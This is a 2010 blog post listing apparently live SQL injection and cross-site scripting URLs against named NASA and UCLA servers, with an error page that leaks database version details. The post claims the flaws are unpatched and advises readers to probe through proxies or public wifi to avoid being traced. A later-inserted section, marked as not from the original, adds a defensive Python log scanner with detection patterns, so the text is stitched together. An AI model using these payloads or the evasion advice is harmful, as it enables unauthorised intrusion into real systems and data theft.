Thursday, February 25, 2010

NASA Servers "0-day" Vulnerabilities

After a series of SQL vulnerabilities last December 2009, the NASA website is in the security limelight again with another set of server vulnerabilities. I am aware that the agency itself has had budget issues lately, and that, added to the fact that they have a lot of servers to maintain on a daily basis, may have contributed to such negligence. However, none of that should be used as an excuse for the security oversight. After all, prevention such as input validation should not cost a single cent, right?



Cross-Site Scripting / SQL Injection:

http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=%27&node=0&instnname=0′AND+1/0;–&Submit=Search

The following error page gives away some precious information: many times it returns a different IP address in the "Remote Address" field. These IP addresses could belong to other remote clients that generated errors, which would mean there is a more serious flaw:

http://www-pds.jpl.nasa.gov/tools/search.jsp?q=NOT
http://www-pds.jpl.nasa.gov/tools/text-search/results.jsp?query=%22
http://www-pds.jpl.nasa.gov/tools/data-search/search.jsp?q=OR
http://www-pds.jpl.nasa.gov/tools/data-search/search.jsp?q=”
etc.

Check the results of this error-based SQL injection:
http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=%27&node=1′%22;/*&instnname=-1;–&Submit=Search
http://www-pds.jpl.nasa.gov/tools/ddlookup/data_dictionary_lookup.cfm?type=element&q=NOT&genclasstype=0′&sysclassid=0

http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=&node=1&instnname=%27%29+OR+1=0+OR+57=rand%28convert%28%27NUMERIC,%27||%28select+@@version%29%29%252b900000000000000000000000%29–&Submit=Search
http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=&node=1&instnname=’)+OR+1=0+OR+57=rand(convert(‘NUMERIC,’||(select+@@version))%252b900000000000000000000000)–&Submit=Search
————————————————————————————————————————————————–
Error Executing Database Query.
Syntax error during explicit conversion of VARCHAR value ‘ Adaptive Server Enterprise/12.5.1/EBF 11429/P/Linux Intel/Enterprise Linux/ase1251/1823/32-bit/OPT/Tue Sep 16 23:43:54 2003′ to a NUMERIC field.

http://sbir.nasa.gov/sbirweb/abstracts/search_result.jsp?program=&phase=&progyr=99&st=&center=&firm=’select+@@version–’&sort=&sort2=&rec_per_page=1&cur_page=-2&start_page=-9999

http://sbir.nasa.gov/sbirweb/abstracts/search_result.jsp?program=SBIR&phase=&progyr=99st=center=firm=SBIR’or+1=utl_inaddr.get_host_address((select+concat(‘A’,count(username))+from+all_users))–’&sort=null&sort2=null&rec_per_page=100&cur_page=1&start_page=1

http://e4eil01u.ecs.nasa.gov:22000/WebAccess/drill?attrib=home%3Cscript%3Ealert(‘XSS–vinnu’)%3C/script%3E&next=group

http://www.igpp.ucla.edu/cgi-bin/ditdos?filter=GOPR_2001,HAL_,DS1_PEPE,DSPE&title=Comet
————————————————————————————————————————————————
http://directreadout.sci.gsfc.nasa.gov/index.cfm?section=home%22%3E%3Cscript%3Ealert(‘XSS–%5C%22vinnu%5C%22′)%3C/script%3E&page=news
http://ssd.jpl.nasa.gov/sbdb_help.cgi?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
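As an added defensive example (not from the original post), a small Python log scanner that flags the request shapes listed above in web-server access logs, including the double-encoded payloads (%252b) seen in the phonebook URLs. The log lines, addresses and paths are constructed for illustration, not captured traffic.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache-style access-log lines modelled on the request shapes quoted
# in the post (addresses and paths are illustrative, not captured traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [25/Feb/2010:10:01:02 +0000] "GET /tools/phonebook/phonebook.cfm?search_field=&node=1&instnname=%27%29+OR+1=0+OR+57=rand%28convert%28%27NUMERIC,%27||%28select+@@version%29%29%252b900%29-- HTTP/1.1" 500 812
203.0.113.6 - - [25/Feb/2010:10:01:05 +0000] "GET /index.cfm?section=home%22%3E%3Cscript%3Ealert(1)%3C/script%3E&page=news HTTP/1.1" 200 5120
203.0.113.7 - - [25/Feb/2010:10:01:09 +0000] "GET /tools/phonebook/phonebook.cfm?search_field=smith&node=1&instnname=0&Submit=Search HTTP/1.1" 200 2210
203.0.113.8 - - [25/Feb/2010:10:01:12 +0000] "GET /sbirweb/abstracts/search_result.jsp?firm=x%27or+1=utl_inaddr.get_host_address((select+1+from+dual))--&sort=null HTTP/1.1" 500 640
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')

# Signatures for the techniques seen in the post: version probes, error-based casts, Oracle helpers, tautologies, script tags.
RULES = {
    "sqli-version-probe": re.compile(r"@@version|\bversion\s*\(", re.I),
    "sqli-error-based-cast": re.compile(r"\b(convert|cast)\s*\(", re.I),
    "sqli-oracle-oob": re.compile(r"\butl_(inaddr|http)\b", re.I),
    "sqli-tautology": re.compile(r"\bor\s+\d+\s*=\s*\d+", re.I),
    "xss-script-tag": re.compile(r"<\s*script\b", re.I),
}

def decode_layers(value, max_rounds=3):
    # Percent-decode repeatedly (bounded) so double-encoded payloads such as %252b are inspected as "+".
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(url):
    # Return (parameter, rule) pairs for every query value that matches a signature.
    hits = []
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = decode_layers(raw)  # parse_qsl already removed one encoding layer
        hits.extend((name, rule) for rule, rx in RULES.items() if rx.search(value))
    return hits

def scan_log(text):
    # One alert per request that matched any rule; a 5xx on an injection attempt means the error page reached the client.
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = inspect_request(m["url"])
        if hits:
            alerts.append({"ip": m["ip"], "path": urlsplit(m["url"]).path, "hits": hits,
                           "error_page": int(m["status"]) >= 500})
    return alerts
```

Running `scan_log(SAMPLE_LOG)` yields three alerts (the benign phonebook search is not flagged), and the two with `error_page` set are the ones where a database error page was served back.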


Safety Reminders :

1. The information above is for educational purposes only and should not be used for illegal purposes such as defacing, information theft, espionage, and the like.
2. Most of the vulnerabilities above are not yet fixed by NASA, so take extra precaution if you have to check the live servers yourself, such as using multiple proxies or simply using public internet access such as a "wifi hotspot".
3. I tried to notify the people in charge via email before posting these vulnerabilities, but have received no reply from them in the 2 weeks since.
4. Credits to Lox and Vinay.
